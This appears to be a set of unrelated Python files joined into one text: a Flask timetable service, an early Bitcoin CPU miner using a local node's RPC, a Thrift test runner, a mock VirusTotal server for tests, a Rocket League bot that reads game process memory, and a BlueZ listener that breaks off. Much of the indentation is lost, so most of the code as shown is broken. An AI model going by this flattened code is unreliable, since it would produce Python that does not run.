days = timetable_data["selectedDay"]
timetable = preformat_timetable(timetable_data)
timetable = evolutionary_algorithm(
timetable, api_url, days=days, timetable_id=timetable_data["timetableId"])
timetable = format_timetable(timetable, timetable_data, days=days)
timetable["timetableName"] = timetable_data["timetableName"]
timetable["academicSession"] = timetable_data["academicSession"]
timetable["timetableId"] = timetable_data["timetableId"]
r = requests.get(api_url, json=timetable, headers={"Content-Type": "application/json"}, params={
"current_progress": 5000, "total_progress": 5000, "timetableId": timetable_data["timetableId"]})
@app.route("/")
def index():
return "Hello World!"
@app.route("/generate/")
def generate():
try:
    timetable_data = request.get_json()
    if timetable_data is None:
        raise ValueError("the request body did not contain JSON")
except Exception:
    return jsonify({"success": False, "message": "the timetable data is missing"}), 400
valid = True
if None in [timetable_data.get("classroom"), timetable_data.get("courses"), timetable_data.get("selectedDay")]:
valid = False
if valid and (not isinstance(timetable_data.get("classroom"), dict)):
valid = False
if valid and (not isinstance(timetable_data.get("courses"), list)):
valid = False
if valid and (not isinstance(timetable_data.get("selectedDay"), list)):
valid = False
if valid:
for i in timetable_data.get("classroom"):
j = timetable_data["classroom"][i]
if None in [j.get("type"), j.get("capacity")]:
valid = False
break
if (not isinstance(j.get("type"), str)) or (not isinstance(j.get("capacity"), int)):
valid = False
break
if j.get("type") not in ["theory", "lab"]:
valid = False
break
if valid:
for i in timetable_data.get("courses"):
if None in [i.get("name"), i.get("lecturer"), i.get("type"), i.get("students"), i.get("unit")]:
valid = False
break
if (not isinstance(i.get("name"), str)) or (not isinstance(i.get("lecturer"), str)) or (not isinstance(i.get("type"), str)) or (not isinstance(i.get("students"), int)) or (not isinstance(i.get("unit"), int)):
valid = False
break
if i.get("type") not in ["theory", "lab"]:
valid = False
break
if not valid:
return jsonify({"success": False, "message": "the timetable data is not correctly formatted"}), 422
thread = threading.Thread(target=timetable_callback, args=[timetable_data])
thread.start()
return jsonify({
"success": True,
"message": "the timetable is being generated",
"current_progress": 0,
"total_progress": 5000
}), 202
if __name__ == "__main__":
app.run(debug=True)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
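# Example: bytereverse(0x12345678) == 0x78563412; bufreverse() applies that
# swap to every 4-byte word of a buffer, while wordreverse() reverses the
# order of the words themselves.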
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6960
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import division
import time
import socket
import subprocess
import sys
import os
import signal
import json
import platform
import shutil
import threading
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--port", type="int", dest="port", default=9090,
help="port number for server to listen on")
parser.add_option('-v', '--verbose', action="store_const",
dest="verbose", const=2,
help="verbose output")
parser.add_option('-q', '--quiet', action="store_const",
dest="verbose", const=0,
help="minimal output")
parser.add_option("--server", type="string", dest="servers", default="",
help="list of servers to test seperated by commas, eg:- --server=cpp,java")
parser.add_option("--client", type="string", dest="clients", default="",
help="list of clients to test seperated by commas, eg:- --client=cpp,java")
parser.set_defaults(verbose=1)
options, args = parser.parse_args()
if options.servers == "":
serversList = []
else:
serversList = options.servers.split(",")
if options.clients == "":
clientsList = []
else:
clientsList = options.clients.split(",")
def relfile(fname):
return os.path.join(os.path.dirname(__file__), fname)
def getSocketArgs(socket_type):
if socket_type == 'ip':
return ""
elif socket_type == 'ip-ssl':
return "--ssl"
elif socket_type == 'domain':
return "--domain-socket=/tmp/ThriftTest.thrift"
def runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, server_protocol, client_protocol, transport, port, use_zlib, socket_type):
# Build command line arguments
server_args = []
cli_args = []
if server_lib == 'java':
server_args.append(server_executable[0])
server_args.append(server_executable[1])
server_args.append(relfile(server_executable[2]))
server_args.extend(['-Dtestargs','\"'])
else:
server_args = [relfile(server_executable)]
if client_lib == 'java':
cli_args.append(client_executable[0])
cli_args.append(client_executable[1])
cli_args.append(relfile(client_executable[2]))
cli_args.extend(['-Dtestargs','\"'])
else:
cli_args = [relfile(client_executable)]
server_args.append('--protocol=%s' % server_protocol)
cli_args.append('--protocol=%s' % client_protocol)
for which in (server_args, cli_args):
which.append('--transport=%s' % transport)
which.append('--port=%d' % port) # default to 9090
if use_zlib:
which.append('--zlib')
if socket_type == 'ip-ssl':
which.append('--ssl')
elif socket_type == 'domain':
which.append('--domain-socket=/tmp/ThriftTest.thrift')
# if options.verbose == 0:
# which.append('-q')
# if options.verbose == 2:
# which.append('-v')
if server_lib == 'java':
server_args.append('\"')
if client_lib == 'java':
cli_args.append('\"')
server_args.extend(server_extra_args)
cli_args.extend(client_extra_args)
server_log=open(relfile("log/" + test_name + "_server.log"),"a")
client_log=open(relfile("log/" + test_name + "_client.log"),"a")
try:
if options.verbose > 0:
print 'Testing server: %s' % (' '.join(server_args))
serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
else:
serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
except OSError as e:
return "OS error({0}): {1}".format(e.errno, e.strerror)
def ensureServerAlive():
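# Return an error string if the server process has already exited.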
if serverproc.poll() is not None:
return 'Server subprocess died, args: %s' % (' '.join(server_args))
# Wait for the server to start accepting connections on the given port.
sock = socket.socket()
sleep_time = 0.1 # Seconds
max_attempts = 100
try:
attempt = 0
if socket_type != 'domain':
while sock.connect_ex(('127.0.0.1', port)) != 0:
attempt += 1
if attempt >= max_attempts:
return "TestServer not ready on port %d after %.2f seconds" % (port, sleep_time * attempt)
alive_error = ensureServerAlive()
if alive_error:
return alive_error
time.sleep(sleep_time)
finally:
sock.close()
try:
o = []
def target():
try:
if options.verbose > 0:
print 'Testing client: %s' % (' '.join(cli_args))
process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
o.append(process)
process.communicate()
else:
process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
o.append(process)
process.communicate()
except OSError as e:
return "OS error({0}): {1}".format(e.errno, e.strerror)
except:
return "Unexpected error:", sys.exc_info()[0]
thread = threading.Thread(target=target)
thread.start()
thread.join(10)
if thread.is_alive():
print 'Terminating process'
o[0].terminate()
thread.join()
if(len(o)==0):
return "Client subprocess failed, args: %s" % (' '.join(cli_args))
ret = o[0].returncode
if ret != 0:
return "Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args))
#raise Exception("Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args)))
finally:
# check that server didn't die
#ensureServerAlive()
extra_sleep = 0
if extra_sleep > 0 and options.verbose > 0:
print ('Giving (protocol=%s,zlib=%s,socket=%s) an extra %d seconds for child '
'processes to terminate via alarm'
% (server_protocol, use_zlib, socket_type, extra_sleep))
time.sleep(extra_sleep)
os.kill(serverproc.pid, signal.SIGTERM)
#serverproc.wait()
client_log.flush()
server_log.flush()
client_log.close()
server_log.close()
test_count = 0
failed = 0
hard_fail_count = 0
platform = platform.system()
if os.path.exists(relfile('log')): shutil.rmtree(relfile('log'))
os.makedirs(relfile('log'))
if os.path.exists(relfile('results.json')): os.remove(relfile('results.json'))
results_json = open(relfile("results.json"),"a")
results_json.write("[\n")
with open(relfile('tests.json')) as data_file:
data = json.load(data_file)
#subprocess.call("export NODE_PATH=../lib/nodejs/test:../lib/nodejs/lib:${NODE_PATH}")
count = 0
for server in data["server"]:
if (server["lib"] in serversList or len(serversList) == 0) and platform in server["platform"]:
server_executable = server["executable"]
server_extra_args = ""
server_lib = server["lib"]
if "extra_args" in server:
server_extra_args = server["extra_args"]
for protocol in server["protocols"]:
for transport in server["transports"]:
for sock in server["sockets"]:
for client in data["client"]:
if (client["lib"] in clientsList or len(clientsList) == 0) and platform in client["platform"]:
client_executable = client["executable"]
client_extra_args = ""
client_lib = client["lib"]
if "extra_args" in client:
client_extra_args = client["extra_args"]
if protocol in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"" + protocol + "\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_" + protocol + "_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, protocol, transport, options.port, 0, sock)
if ret != None:
failed += 1
if client["exit"] == "hard" and server["exit"] == "hard":
hard_fail_count +=1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport, getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
if protocol == 'binary' and 'accel' in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"accel-binary\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_accel-binary_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'accel', transport, options.port, 0, sock)
if ret != None:
failed += 1
if client["exit"] == "hard" and server["exit"] == "hard":
hard_fail_count +=1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport , getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
if protocol == 'accel' and 'binary' in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"binary-accel\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_binary-accel_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'binary', transport, options.port, 0, sock)
if ret != None:
failed += 1
if client["exit"] == "hard" and server["exit"] == "hard":
hard_fail_count +=1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport + sock, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport + sock, getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
results_json.write("\n]")
results_json.flush()
results_json.close()
print '%d of %d tests failed in total' % (failed, test_count)
sys.exit(hard_fail_count)
|
mock_vthttpserver.py
|
import os
import socket
import re
try: #Python 3
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
import urllib.parse as urlparse
except ImportError: #Python 2.7
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
import urlparse
from threading import Thread
import requests
from dxlbootstrap.util import MessageUtils
from dxlvtapiservice import VirusTotalApiService
from dxlvtapiservice.requesthandlers import VirusTotalApiRequestCallback
from tests.test_value_constants import *
TEST_FOLDER = str(os.path.dirname(os.path.abspath(__file__)).replace("\\", "/"))
MOCK_EPOHTTPSERVER_CERTNAME = TEST_FOLDER + "/client.crt"
MOCK_EPOHTTPSERVER_KEYNAME = TEST_FOLDER + "/client.key"
def get_free_port():
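# Bind to port 0 so the OS assigns a free ephemeral port, then release it for the mock server to use.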
stream_socket = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
stream_socket.bind(('localhost', 0))
address, port = stream_socket.getsockname()
stream_socket.close()
return address, port
class MockVtServerRequestHandler(SimpleHTTPRequestHandler):
#pylint: disable=line-too-long, no-member
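# Serves canned VirusTotal API v2 responses for the unit tests.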
BASE_PATTERN = "/vtapi/v2{0}"
FILE_RESCAN_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_FILE_RESCAN[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
FILE_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_FILE_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
URL_SCAN_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_URL_SCAN[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
URL_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_URL_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
IP_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_IP_ADDRESS_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
DOMAIN_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_DOMAIN_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
RATE_EXCEED_PATTERN = re.compile(RATE_EXCEED_SERVER_PATH)
HTTP_ERROR_PATTERN = re.compile(HTTP_ERROR_SERVER_PATH)
def do_GET(self):
response_code = requests.codes.ok
parsed_url = urlparse.urlparse(self.path)
parsed_api_key = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP.lower()][0]
if parsed_api_key == SAMPLE_API_KEY:
if re.search(self.DOMAIN_REPORT_PATTERN, self.path):
response_content = self.domain_report_cmd(parsed_url)
elif re.search(self.FILE_REPORT_PATTERN, self.path):
response_content = self.file_report_cmd(parsed_url)
elif re.search(self.IP_REPORT_PATTERN, self.path):
response_content = self.ip_report_cmd(parsed_url)
elif re.search(self.RATE_EXCEED_PATTERN, self.path):
response_code = requests.codes.no_content
response_content = ""
elif re.search(self.HTTP_ERROR_PATTERN, self.path):
response_code = requests.codes.internal_server_error
response_content = "500 - Internal Server Error"
else:
response_content = self.unknown_call(self.path)
else:
response_content = self.bad_param(
VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP,
parsed_api_key
)
self.send_response(response_code, response_content)
self.send_header('Content-Type', 'text/plain; charset=utf-8', )
self.end_headers()
self.wfile.write(response_content.encode('utf-8'))
def do_POST(self): #pylint: disable=invalid-name
parsed_url = urlparse.urlparse(self.path)
parsed_api_key = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP.lower()][0]
if parsed_api_key == SAMPLE_API_KEY:
if re.search(self.FILE_RESCAN_PATTERN, self.path):
response_content = self.file_rescan_cmd(parsed_url)
elif re.search(self.URL_REPORT_PATTERN, self.path):
response_content = self.url_report_cmd(parsed_url)
elif re.search(self.URL_SCAN_PATTERN, self.path):
response_content = self.url_scan_cmd(parsed_url)
else:
response_content = self.unknown_call(self.path)
else:
response_content = self.bad_param(
VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP,
parsed_api_key
)
self.send_response(requests.codes.ok, response_content)
self.send_header('Content-Type', 'text/plain; charset=utf-8', )
self.end_headers()
self.wfile.write(response_content.encode('utf-8'))
def domain_report_cmd(self, parsed_url):
domain = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_DOMAIN][0]
if domain == SAMPLE_DOMAIN:
return MessageUtils.dict_to_json(SAMPLE_DOMAIN_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_DOMAIN, domain)
def file_report_cmd(self, parsed_url):
resource = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_RESOURCE][0]
if resource == SAMPLE_FILE:
return MessageUtils.dict_to_json(SAMPLE_FILE_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_RESOURCE, resource)
def file_rescan_cmd(self, parsed_url):
resource = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_RESOURCE][0]
if resource == SAMPLE_FILE:
return MessageUtils.dict_to_json(SAMPLE_FILE_RESCAN, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_RESOURCE, resource)
def ip_report_cmd(self, parsed_url):
ip_address = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_IP][0]
if ip_address == SAMPLE_IP:
return MessageUtils.dict_to_json(SAMPLE_IP_ADDRESS_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_IP, ip_address)
def url_report_cmd(self, parsed_url):
url = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_RESOURCE][0]
if url == SAMPLE_URL:
return MessageUtils.dict_to_json(SAMPLE_URL_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_RESOURCE, url)
def url_scan_cmd(self, parsed_url):
url = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_URL][0]
if url == SAMPLE_URL:
return MessageUtils.dict_to_json(SAMPLE_URL_SCAN, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_URL, url)
@staticmethod
def bad_param(param_name, param_val):
return MessageUtils.dict_to_json(
{
"unit_test_bad_param_name": param_name,
"unit_test_bad_param_val": param_val
},
pretty_print=False
)
@staticmethod
def unknown_call(path):
return MessageUtils.dict_to_json(
{
"unit_test_error_unknown_api": path
},
pretty_print=False
)
class MockServerRunner(object):
def __init__(self):
self.server_name = "mockvtserver"
self.mock_server_port = 0
self.mock_server = None
self.mock_server_address = ""
self.mock_server_thread = None
def __enter__(self):
self.mock_server_address, self.mock_server_port = get_free_port()
self.mock_server = TCPServer(
('localhost', self.mock_server_port),
MockVtServerRequestHandler
)
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
self.mock_server_thread.setDaemon(True)
self.mock_server_thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.mock_server.shutdown()
self.mock_server_thread.join()
self.mock_server.server_close()
|
runner.py
|
from ctypes import *
from ctypes.wintypes import *
from multiprocessing import Process, Array, Queue
import queue  # multiprocessing queues raise queue.Full / queue.Empty from the standard queue module
import time
import realTimeDisplay
import ReadWriteMem
import PlayHelper
import array
import AlwaysTowardsBallAgent
OpenProcess = windll.kernel32.OpenProcess
CloseHandle = windll.kernel32.CloseHandle
ph = PlayHelper.play_helper()
def updateInputs(inputs, scoring, ph):
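# Continuously read game state from the RocketLeague.exe process memory and publish it into the shared arrays.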
PROCESS_ALL_ACCESS = 0x1F0FFF
rwm = ReadWriteMem.ReadWriteMem()
pid = rwm.GetProcessIdByName("RocketLeague.exe")
rocketLeagueBaseAddress = rwm.GetBaseAddress(pid)
processHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
blueScore = None
orangeScore = None
blueDemo = None
orangeDemo = None
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
while(True):
values = ph.GetValueVector(processHandle, addresses)
# Process scoring to see if any new goals or demos
if (blueScore == None):
# Need to update values if don't already exist
blueScore = values[1][0]
orangeScore = values[1][1]
blueDemo = values[1][2]
orangeDemo = values[1][3]
if (not blueScore == values[1][0]):
print("Blue has scored! Waiting for ball and players to reset")
blueScore = values[1][0]
time.sleep(15) # Sleep 15 seconds for goal and replay then ping for correct values
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
while (ph.ping_refreshed_pointers(processHandle, addresses)):
time.sleep(0.5)
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
if (not orangeScore == values[1][1]):
print("Orange has scored! Waiting for ball and players to reset")
orangeScore = values[1][1]
time.sleep(15) # Sleep 15 seconds for goal and replay then ping for correct values
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
while (ph.ping_refreshed_pointers(processHandle, addresses)):
time.sleep(0.5)
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
if (not blueDemo == values[1][2]):
print("Orange has scored a demo on blue! Waiting for blue player to reset")
blueDemo = values[1][2]
time.sleep(4) # Takes about 3 seconds to respawn for a demo
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
if (not orangeDemo == values[1][3]):
print("Blue has scored a demo on orange! Waiting for orange player to reset")
orangeDemo = values[1][3]
time.sleep(4) # Takes about 3 seconds to respawn from demo. Even though blue can keep playing, for training I am just sleeping
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
# Finally update input to values
for i in range(len(values[0])):
inputs[i] = values[0][i]
for i in range(len(values[1])):
scoring[i] = values[1][i]
time.sleep(0.01)
def runAgent(inputs, scoring, agent, q):
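# Poll the shared game state and push the agent's controller output onto its queue.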
# Deep copy inputs?
while(True):
output1 = agent.get_output_vector((inputs,scoring))
try:
q.put_nowait(output1)  # drop this update if the consumer has not drained the queue yet
except queue.Full:
pass
time.sleep(0.01)
if __name__ == '__main__':
time.sleep(3) # Sleep 3 second before starting to give me time to set things up
inputs = Array('f', [0.0 for x in range(38)])
scoring = Array('f', [0.0 for x in range(12)])
agent1 = AlwaysTowardsBallAgent.agent("blue")
agent2 = AlwaysTowardsBallAgent.agent("orange")
q1 = Queue(1)
q2 = Queue(1)
output1 = [16383, 16383, 32767, 0, 0, 0, 0]
output2 = [16383, 16383, 32767, 0, 0, 0, 0]
rtd = realTimeDisplay.real_time_display()
rtd.build_initial_window(agent1.get_bot_name(), agent2.get_bot_name())
ph = PlayHelper.play_helper()
p1 = Process(target=updateInputs, args=(inputs, scoring, ph))
p1.start()
p2 = Process(target=runAgent, args=(inputs, scoring, agent1, q1))
p2.start()
p3 = Process(target=runAgent, args=(inputs, scoring, agent2, q2))
p3.start()
while (True):
updateFlag = False
rtd.UpdateDisplay((inputs,scoring))
try:
output1 = q1.get_nowait()
updateFlag = True
except queue.Empty:
pass
try:
output2 = q2.get_nowait()
updateFlag = True
except queue.Empty:
pass
if (updateFlag):
ph.update_controllers(output1, output2)
rtd.UpdateKeyPresses(output1, output2)
time.sleep(0.01)
|
listener.py
|
from time import time
from threading import Thread
from flask import current_app
from gi.repository import GLib, Gio
from . import db, error
from .device import update_rssi, sensordata
from .timeutil import get_timedelta
def init(app):
with app.app_context():
try:
bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)
names = bus.call_sync(
"org.freedesktop.DBus",
"/org/freedesktop/DBus",
"org.freedesktop.DBus",
"ListNames",
None,
None,
Gio.DBusCallFlags.NONE,
-1,
None,
)
if "org.bluez" not in names[0]:
error.log(500, "Bluetooth Error", "The BlueZ service is not running")
return None
user_data = {
"db_path": current_app.config["DB_PATH"],
"rate_limit": get_timedelta(
current_app.config.get("RATE_LIMIT")
).total_seconds(),
}
thread = Thread(target=listen, args=(user_data,))
thread.start()
except GLib.Error:
error.log(500, "DBus Error", "Could not connect to the system bus.")
def listen(user_data):
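# Start BlueZ discovery and subscribe to PropertiesChanged signals for every known device.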
try:
